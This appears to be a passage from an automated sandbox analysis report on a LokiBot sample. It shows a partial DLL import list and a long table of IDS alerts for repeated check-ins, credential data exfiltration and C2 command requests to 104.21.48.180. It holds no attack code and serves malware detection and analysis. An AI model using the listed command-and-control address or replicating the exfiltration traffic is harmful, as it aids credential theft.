                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                        DescriptionData
                        Translation0x0809 0x04b0
                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-02-20T16:16:16.322309+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549704104.21.48.180TCP
                        2025-02-20T16:16:16.322309+01002025381ET MALWARE LokiBot Checkin1192.168.2.549704104.21.48.180TCP
                        2025-02-20T16:16:16.322309+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549704104.21.48.180TCP
                        2025-02-20T16:16:17.139892+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549704104.21.48.180TCP
                        2025-02-20T16:16:17.307331+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549705104.21.48.180TCP
                        2025-02-20T16:16:17.307331+01002025381ET MALWARE LokiBot Checkin1192.168.2.549705104.21.48.180TCP
                        2025-02-20T16:16:17.307331+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549705104.21.48.180TCP
                        2025-02-20T16:16:18.087669+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549705104.21.48.180TCP
                        2025-02-20T16:16:18.367474+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549706104.21.48.180TCP
                        2025-02-20T16:16:18.367474+01002025381ET MALWARE LokiBot Checkin1192.168.2.549706104.21.48.180TCP
                        2025-02-20T16:16:18.367474+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549706104.21.48.180TCP
                        2025-02-20T16:16:19.177352+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549706104.21.48.180TCP
                        2025-02-20T16:16:19.177352+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549706104.21.48.180TCP
                        2025-02-20T16:16:19.182403+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549706TCP
                        2025-02-20T16:16:19.335336+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549707104.21.48.180TCP
                        2025-02-20T16:16:19.335336+01002025381ET MALWARE LokiBot Checkin1192.168.2.549707104.21.48.180TCP
                        2025-02-20T16:16:19.335336+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549707104.21.48.180TCP
                        2025-02-20T16:16:20.171562+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549707104.21.48.180TCP
                        2025-02-20T16:16:20.171562+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549707104.21.48.180TCP
                        2025-02-20T16:16:20.177402+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549707TCP
                        2025-02-20T16:16:20.324351+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549708104.21.48.180TCP
                        2025-02-20T16:16:20.324351+01002025381ET MALWARE LokiBot Checkin1192.168.2.549708104.21.48.180TCP
                        2025-02-20T16:16:20.324351+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549708104.21.48.180TCP
                        2025-02-20T16:16:21.163109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549708104.21.48.180TCP
                        2025-02-20T16:16:21.163109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549708104.21.48.180TCP
                        2025-02-20T16:16:21.169617+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549708TCP
                        2025-02-20T16:16:21.323819+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549709104.21.48.180TCP
                        2025-02-20T16:16:21.323819+01002025381ET MALWARE LokiBot Checkin1192.168.2.549709104.21.48.180TCP
                        2025-02-20T16:16:21.323819+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549709104.21.48.180TCP
                        2025-02-20T16:16:22.133438+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549709104.21.48.180TCP
                        2025-02-20T16:16:22.133438+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549709104.21.48.180TCP
                        2025-02-20T16:16:22.138621+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549709TCP
                        2025-02-20T16:16:22.294705+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549710104.21.48.180TCP
                        2025-02-20T16:16:22.294705+01002025381ET MALWARE LokiBot Checkin1192.168.2.549710104.21.48.180TCP
                        2025-02-20T16:16:22.294705+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549710104.21.48.180TCP
                        2025-02-20T16:16:23.036473+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549710104.21.48.180TCP
                        2025-02-20T16:16:23.036473+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549710104.21.48.180TCP
                        2025-02-20T16:16:23.200838+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549711104.21.48.180TCP
                        2025-02-20T16:16:23.200838+01002025381ET MALWARE LokiBot Checkin1192.168.2.549711104.21.48.180TCP
                        2025-02-20T16:16:23.200838+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549711104.21.48.180TCP
                        2025-02-20T16:16:23.971117+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549711104.21.48.180TCP
                        2025-02-20T16:16:23.971117+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549711104.21.48.180TCP
                        2025-02-20T16:16:23.976249+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549711TCP
                        2025-02-20T16:16:24.125311+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549712104.21.48.180TCP
                        2025-02-20T16:16:24.125311+01002025381ET MALWARE LokiBot Checkin1192.168.2.549712104.21.48.180TCP
                        2025-02-20T16:16:24.125311+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549712104.21.48.180TCP
                        2025-02-20T16:16:24.882922+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549712104.21.48.180TCP
                        2025-02-20T16:16:24.882922+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549712104.21.48.180TCP
                        2025-02-20T16:16:24.887951+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549712TCP
                        2025-02-20T16:16:25.039521+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549713104.21.48.180TCP
                        2025-02-20T16:16:25.039521+01002025381ET MALWARE LokiBot Checkin1192.168.2.549713104.21.48.180TCP
                        2025-02-20T16:16:25.039521+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549713104.21.48.180TCP
                        2025-02-20T16:16:25.823481+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549713104.21.48.180TCP
                        2025-02-20T16:16:25.823481+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549713104.21.48.180TCP
                        2025-02-20T16:16:25.829866+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549713TCP
                        2025-02-20T16:16:25.981651+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549714104.21.48.180TCP
                        2025-02-20T16:16:25.981651+01002025381ET MALWARE LokiBot Checkin1192.168.2.549714104.21.48.180TCP
                        2025-02-20T16:16:25.981651+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549714104.21.48.180TCP
                        2025-02-20T16:16:26.809908+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549714104.21.48.180TCP
                        2025-02-20T16:16:26.809908+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549714104.21.48.180TCP
                        2025-02-20T16:16:26.816096+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549714TCP
                        2025-02-20T16:16:26.969517+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549715104.21.48.180TCP
                        2025-02-20T16:16:26.969517+01002025381ET MALWARE LokiBot Checkin1192.168.2.549715104.21.48.180TCP
                        2025-02-20T16:16:26.969517+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549715104.21.48.180TCP
                        2025-02-20T16:16:27.787542+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549715104.21.48.180TCP
                        2025-02-20T16:16:27.787542+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549715104.21.48.180TCP
                        2025-02-20T16:16:27.795354+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549715TCP
                        2025-02-20T16:16:28.022554+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549716104.21.48.180TCP
                        2025-02-20T16:16:28.022554+01002025381ET MALWARE LokiBot Checkin1192.168.2.549716104.21.48.180TCP
                        2025-02-20T16:16:28.022554+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549716104.21.48.180TCP
                        2025-02-20T16:16:28.816412+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549716104.21.48.180TCP
                        2025-02-20T16:16:28.816412+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549716104.21.48.180TCP
                        2025-02-20T16:16:28.821514+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549716TCP
                        2025-02-20T16:16:28.967798+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549717104.21.48.180TCP
                        2025-02-20T16:16:28.967798+01002025381ET MALWARE LokiBot Checkin1192.168.2.549717104.21.48.180TCP
                        2025-02-20T16:16:28.967798+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549717104.21.48.180TCP
                        2025-02-20T16:16:29.787907+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549717104.21.48.180TCP
                        2025-02-20T16:16:29.787907+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549717104.21.48.180TCP
                        2025-02-20T16:16:29.793028+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549717TCP
                        2025-02-20T16:16:29.956089+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549720104.21.48.180TCP
                        2025-02-20T16:16:29.956089+01002025381ET MALWARE LokiBot Checkin1192.168.2.549720104.21.48.180TCP
                        2025-02-20T16:16:29.956089+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549720104.21.48.180TCP
                        2025-02-20T16:16:30.715606+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549720104.21.48.180TCP
                        2025-02-20T16:16:30.715606+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549720104.21.48.180TCP
                        2025-02-20T16:16:30.900670+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549722104.21.48.180TCP
                        2025-02-20T16:16:30.900670+01002025381ET MALWARE LokiBot Checkin1192.168.2.549722104.21.48.180TCP
                        2025-02-20T16:16:30.900670+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549722104.21.48.180TCP
                        2025-02-20T16:16:31.713901+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549722104.21.48.180TCP
                        2025-02-20T16:16:31.713901+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549722104.21.48.180TCP
                        2025-02-20T16:16:31.719265+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549722TCP
                        2025-02-20T16:16:31.873987+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549733104.21.48.180TCP
                        2025-02-20T16:16:31.873987+01002025381ET MALWARE LokiBot Checkin1192.168.2.549733104.21.48.180TCP
                        2025-02-20T16:16:31.873987+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549733104.21.48.180TCP
                        2025-02-20T16:16:32.623728+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549733104.21.48.180TCP
                        2025-02-20T16:16:32.623728+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549733104.21.48.180TCP
                        2025-02-20T16:16:32.797871+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549741104.21.48.180TCP
                        2025-02-20T16:16:32.797871+01002025381ET MALWARE LokiBot Checkin1192.168.2.549741104.21.48.180TCP
                        2025-02-20T16:16:32.797871+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549741104.21.48.180TCP
                        2025-02-20T16:16:33.588298+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549741104.21.48.180TCP
                        2025-02-20T16:16:33.588298+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549741104.21.48.180TCP
                        2025-02-20T16:16:33.593317+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549741TCP
                        2025-02-20T16:16:33.758158+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549747104.21.48.180TCP
                        2025-02-20T16:16:33.758158+01002025381ET MALWARE LokiBot Checkin1192.168.2.549747104.21.48.180TCP
                        2025-02-20T16:16:33.758158+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549747104.21.48.180TCP
                        2025-02-20T16:16:34.514783+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549747104.21.48.180TCP
                        2025-02-20T16:16:34.514783+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549747104.21.48.180TCP
                        2025-02-20T16:16:34.520499+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549747TCP
                        2025-02-20T16:16:34.669656+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549753104.21.48.180TCP
                        2025-02-20T16:16:34.669656+01002025381ET MALWARE LokiBot Checkin1192.168.2.549753104.21.48.180TCP
                        2025-02-20T16:16:34.669656+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549753104.21.48.180TCP
                        2025-02-20T16:16:35.456566+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549753104.21.48.180TCP
                        2025-02-20T16:16:35.456566+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549753104.21.48.180TCP
                        2025-02-20T16:16:35.461670+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549753TCP
                        2025-02-20T16:16:35.612325+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549759104.21.48.180TCP
                        2025-02-20T16:16:35.612325+01002025381ET MALWARE LokiBot Checkin1192.168.2.549759104.21.48.180TCP
                        2025-02-20T16:16:35.612325+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549759104.21.48.180TCP
                        2025-02-20T16:16:36.386720+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549759104.21.48.180TCP
                        2025-02-20T16:16:36.386720+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549759104.21.48.180TCP
                        2025-02-20T16:16:36.394498+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549759TCP
                        2025-02-20T16:16:36.551922+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549764104.21.48.180TCP
                        2025-02-20T16:16:36.551922+01002025381ET MALWARE LokiBot Checkin1192.168.2.549764104.21.48.180TCP
                        2025-02-20T16:16:36.551922+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549764104.21.48.180TCP
                        2025-02-20T16:16:37.321105+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549764104.21.48.180TCP
                        2025-02-20T16:16:37.321105+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549764104.21.48.180TCP
                        2025-02-20T16:16:37.326112+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549764TCP
                        2025-02-20T16:16:37.492477+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549771104.21.48.180TCP
                        2025-02-20T16:16:37.492477+01002025381ET MALWARE LokiBot Checkin1192.168.2.549771104.21.48.180TCP
                        2025-02-20T16:16:37.492477+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549771104.21.48.180TCP
                        2025-02-20T16:16:38.234217+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549771104.21.48.180TCP
                        2025-02-20T16:16:38.234217+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549771104.21.48.180TCP
                        2025-02-20T16:16:38.389144+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549777104.21.48.180TCP
                        2025-02-20T16:16:38.389144+01002025381ET MALWARE LokiBot Checkin1192.168.2.549777104.21.48.180TCP
                        2025-02-20T16:16:38.389144+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549777104.21.48.180TCP
                        2025-02-20T16:16:39.175015+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549777104.21.48.180TCP
                        2025-02-20T16:16:39.175015+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549777104.21.48.180TCP
                        2025-02-20T16:16:39.180068+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549777TCP
                        2025-02-20T16:16:39.334739+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549784104.21.48.180TCP
                        2025-02-20T16:16:39.334739+01002025381ET MALWARE LokiBot Checkin1192.168.2.549784104.21.48.180TCP
                        2025-02-20T16:16:39.334739+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549784104.21.48.180TCP
                        2025-02-20T16:16:39.981665+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549784104.21.48.180TCP
                        2025-02-20T16:16:39.981665+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549784104.21.48.180TCP
                        2025-02-20T16:16:39.986621+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549784TCP
                        2025-02-20T16:16:40.131753+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549790104.21.48.180TCP
                        2025-02-20T16:16:40.131753+01002025381ET MALWARE LokiBot Checkin1192.168.2.549790104.21.48.180TCP
                        2025-02-20T16:16:40.131753+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549790104.21.48.180TCP
                        2025-02-20T16:16:40.750572+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549790104.21.48.180TCP
                        2025-02-20T16:16:40.750572+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549790104.21.48.180TCP
                        2025-02-20T16:16:40.755807+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549790TCP
                        2025-02-20T16:16:40.896407+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549796104.21.48.180TCP
                        2025-02-20T16:16:40.896407+01002025381ET MALWARE LokiBot Checkin1192.168.2.549796104.21.48.180TCP
                        2025-02-20T16:16:40.896407+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549796104.21.48.180TCP
                        2025-02-20T16:16:41.634702+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549796104.21.48.180TCP
                        2025-02-20T16:16:41.634702+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549796104.21.48.180TCP
                        2025-02-20T16:16:41.796338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549802104.21.48.180TCP
                        2025-02-20T16:16:41.796338+01002025381ET MALWARE LokiBot Checkin1192.168.2.549802104.21.48.180TCP
                        2025-02-20T16:16:41.796338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549802104.21.48.180TCP
                        2025-02-20T16:16:42.456542+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549802104.21.48.180TCP
                        2025-02-20T16:16:42.456542+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549802104.21.48.180TCP
                        2025-02-20T16:16:42.461512+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549802TCP
                        2025-02-20T16:16:42.604162+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549808104.21.48.180TCP
                        2025-02-20T16:16:42.604162+01002025381ET MALWARE LokiBot Checkin1192.168.2.549808104.21.48.180TCP
                        2025-02-20T16:16:42.604162+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549808104.21.48.180TCP
                        2025-02-20T16:16:43.342275+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549808104.21.48.180TCP
                        2025-02-20T16:16:43.342275+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549808104.21.48.180TCP
                        2025-02-20T16:16:43.498058+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549816104.21.48.180TCP
                        2025-02-20T16:16:43.498058+01002025381ET MALWARE LokiBot Checkin1192.168.2.549816104.21.48.180TCP
                        2025-02-20T16:16:43.498058+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549816104.21.48.180TCP
                        2025-02-20T16:16:44.161594+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549816104.21.48.180TCP
                        2025-02-20T16:16:44.161594+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549816104.21.48.180TCP
                        2025-02-20T16:16:44.166929+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549816TCP
                        2025-02-20T16:16:44.335802+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549823104.21.48.180TCP
                        2025-02-20T16:16:44.335802+01002025381ET MALWARE LokiBot Checkin1192.168.2.549823104.21.48.180TCP
                        2025-02-20T16:16:44.335802+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549823104.21.48.180TCP
                        2025-02-20T16:16:45.111969+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549823104.21.48.180TCP
                        2025-02-20T16:16:45.111969+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549823104.21.48.180TCP
                        2025-02-20T16:16:45.116954+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549823TCP
                        2025-02-20T16:16:45.259021+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549829104.21.48.180TCP
                        2025-02-20T16:16:45.259021+01002025381ET MALWARE LokiBot Checkin1192.168.2.549829104.21.48.180TCP
                        2025-02-20T16:16:45.259021+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549829104.21.48.180TCP
                        2025-02-20T16:16:45.899639+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549829104.21.48.180TCP
                        2025-02-20T16:16:45.899639+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549829104.21.48.180TCP
                        2025-02-20T16:16:45.904636+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549829TCP
                        2025-02-20T16:16:46.052711+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549835104.21.48.180TCP
                        2025-02-20T16:16:46.052711+01002025381ET MALWARE LokiBot Checkin1192.168.2.549835104.21.48.180TCP
                        2025-02-20T16:16:46.052711+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549835104.21.48.180TCP
                        2025-02-20T16:16:46.867512+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549835104.21.48.180TCP
                        2025-02-20T16:16:46.867512+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549835104.21.48.180TCP
                        2025-02-20T16:16:46.872648+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549835TCP
                        2025-02-20T16:16:47.026184+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549840104.21.48.180TCP
                        2025-02-20T16:16:47.026184+01002025381ET MALWARE LokiBot Checkin1192.168.2.549840104.21.48.180TCP
                        2025-02-20T16:16:47.026184+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549840104.21.48.180TCP
                        2025-02-20T16:16:47.881796+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549840104.21.48.180TCP
                        2025-02-20T16:16:47.881796+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549840104.21.48.180TCP
                        2025-02-20T16:16:48.037442+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549848104.21.48.180TCP
                        2025-02-20T16:16:48.037442+01002025381ET MALWARE LokiBot Checkin1192.168.2.549848104.21.48.180TCP
                        2025-02-20T16:16:48.037442+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549848104.21.48.180TCP
                        2025-02-20T16:16:48.821573+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549848104.21.48.180TCP
                        2025-02-20T16:16:48.821573+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549848104.21.48.180TCP
                        2025-02-20T16:16:48.826626+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549848TCP
                        2025-02-20T16:16:48.973042+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549856104.21.48.180TCP
                        2025-02-20T16:16:48.973042+01002025381ET MALWARE LokiBot Checkin1192.168.2.549856104.21.48.180TCP
                        2025-02-20T16:16:48.973042+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549856104.21.48.180TCP
                        2025-02-20T16:16:49.901047+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549856104.21.48.180TCP
                        2025-02-20T16:16:49.901047+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549856104.21.48.180TCP
                        2025-02-20T16:16:49.906056+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549856TCP
                        2025-02-20T16:16:50.051457+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549863104.21.48.180TCP
                        2025-02-20T16:16:50.051457+01002025381ET MALWARE LokiBot Checkin1192.168.2.549863104.21.48.180TCP
                        2025-02-20T16:16:50.051457+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549863104.21.48.180TCP
                        2025-02-20T16:16:50.829122+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549863104.21.48.180TCP
                        2025-02-20T16:16:50.829122+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549863104.21.48.180TCP
                        2025-02-20T16:16:50.834153+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549863TCP
                        2025-02-20T16:16:51.000609+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549869104.21.48.180TCP
                        2025-02-20T16:16:51.000609+01002025381ET MALWARE LokiBot Checkin1192.168.2.549869104.21.48.180TCP
                        2025-02-20T16:16:51.000609+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549869104.21.48.180TCP
                        2025-02-20T16:16:51.613601+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549869104.21.48.180TCP
                        2025-02-20T16:16:51.613601+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549869104.21.48.180TCP
                        2025-02-20T16:16:51.618680+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549869TCP
                        2025-02-20T16:16:51.758357+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549875104.21.48.180TCP
                        2025-02-20T16:16:51.758357+01002025381ET MALWARE LokiBot Checkin1192.168.2.549875104.21.48.180TCP
                        2025-02-20T16:16:51.758357+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549875104.21.48.180TCP
                        2025-02-20T16:16:52.535331+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549875104.21.48.180TCP
                        2025-02-20T16:16:52.535331+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549875104.21.48.180TCP
                        2025-02-20T16:16:52.540516+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.48.180192.168.2.549875TCP
                        2025-02-20T16:16:52.697953+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549884104.21.48.180TCP
                        2025-02-20T16:16:52.697953+01002025381ET MALWARE LokiBot Checkin1192.168.2.549884104.21.48.180TCP
                        2025-02-20T16:16:52.697953+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549884104.21.48.180TCP
